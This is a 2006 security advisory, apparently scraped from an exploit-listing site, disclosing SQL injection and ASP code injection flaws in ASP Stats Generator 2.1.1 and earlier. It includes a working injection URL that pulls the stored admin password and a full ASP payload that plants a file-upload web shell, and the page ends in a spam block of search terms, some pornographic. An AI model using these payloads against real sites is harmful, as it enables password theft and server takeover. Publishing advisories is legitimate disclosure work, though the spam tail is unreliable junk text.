about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ASP Stats Generator <= 2.1.1 SQL Injection Vulnerabilities




2006-06-19 ASP Stats Generator <= 2.1.1 SQL Injection Vulnerabilities 
Rated as : High Risk

/*------------------------------------------------
		IHS Public advisory 
-------------------------------------------------*/

ASP Stats Generator SQL-ASP injection - Code Excution 
ASP Stats Generator is a powerful website counter, completely written in
ASP programming language.
The application is able to track web site activity generating graphical
and statistical reports.
It combines a server side class with a javascript system to get a wide
range of visitors' details.
http://www.weppos.com

Credit:
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND
SECURITY)
The original article can be found at: 

http://www.IHSteam.com
http://www.hamid.ir/security/


Vulnerable Systems:
ASP Stats Generator 2.1.1 - 2.1 and below

SQL injection :

Example :
The following URL can be used to trigger an SQL injection vulnerability in
the pages.asp:
http://localhost/myasg/pages.asp?order='&mese=1

Microsoft JET Database Engine error '80040e14' 
Syntax error in string in query expression 'SUM(Visits) ''. 
/myasg/pages.asp, line 236 

Exploit :

http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from
tblst_config&mese=1


ASP Code Injection  :
Input passed to the strAsgSknPageBgColour (and ...) in
"settings_skin.asp"  isn't properly sanitised before being stored
in the "inc_skin_file.asp".
This can be exploited to inject  arbitrary ASP code.

Exploit :

#F9F9F9" : dim path,hstr, mpath, content, filename:
mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"):
content = request("content"): filename =
request("filename"): on error resume next: Dim objFSO,f: Set
objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if
not filename = "" then: response.Write( "Have
File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path =
filename: end if: if not content="" then: response.Write(
"Contented.<BR>" ): set f = objFSO.CreateTextFile( path ):
response.Write( err.Description & "<BR>" ): f.Write(
content ): response.Write( err.Description & "<BR>" ):
f.close: end
if	%><%=filename%><BR><%=path%><BR><%=
Request("path") %><BR><FORM ID="SForm"
method="post"><TABLE width="300"
border="1" ID="Table1"><TR><TD><P
align="center"><STRONG><FONT
size="6">Upload
File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA
name="content" rows="15" cols="46"
><%=content%></TEXTAREA></TD></TR><TR><TD><P
align="center">File Name:<%=strAsgMapPathTo%><INPUT
type="text" name="filename"
value="<%=filename%>" ></P><P
align="center"><INPUT type="submit"
value="Upload" ID="Submit1"
NAME="Submit1"></P></TD></TR></TABLE></FORM><%
objFSO = Nothing: on error goto 0: hstr = "
[m.r.roohian]
attacker can upload  "cmd.asp" with this uploader and ...


Solution:
use ASP Stats Generator v2.1.2 (18/06/2006 )
securitydot.net - 2006-06-19

Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 07:34:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
brother fu yoonis cad +localhost restore.cg news for c hinata hen local root +Powered+b format str nude pics Version 6. magic sexy hindi sexy legs 200 /compo mambo Remo php-nuke 2 indian pro Www.tube8. playboypor Fatass php-nuke 2 donglod telaguxxx www.freese news for c ANIMAL SEX total pdf www.midnig dog.sex.co www.98.com 200 /compo openssh ex lo513l www.gamedo Www. Sexma www.2000ok remote win news for c phil Super sexy MKPQuote www.2000ok mambo Remo how+to+ins boot %2Fsearch% aber yahoo pho www.teenpu